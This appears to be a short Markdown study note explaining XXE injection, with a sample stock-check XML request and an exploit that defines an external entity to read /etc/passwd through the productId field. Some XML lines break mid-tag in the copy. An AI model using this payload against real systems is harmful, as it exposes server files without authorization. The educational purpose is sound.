24 lines
823 B
Markdown
24 lines
823 B
Markdown
|
|
||
|
## Exploiting XXE to Retrieve Files
|
||
|
|
||
|
- Need to modify submitted XML in two ways
|
||
|
- Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to a file.
|
||
|
- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.
|
||
|
|
||
|
- Example -- shopping application checking for stock by submitting the following XML:
|
||
|
```xml
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<stockCheck><productId>381</productId><
|
||
|
/stockCheck>
|
||
|
```
|
||
|
|
||
|
- Exploit
|
||
|
```xml
|
||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM
|
||
|
"file:///etc/passwd"> ]>
|
||
|
<stockCheck><productId>&xxe;</productId></st
|
||
|
ockCheck>
|
||
|
```
|
||
|
|
||
|
Define an external entity (&xxe;) whose value is the contents of /etc/passwd and uses the entity within the productId value
|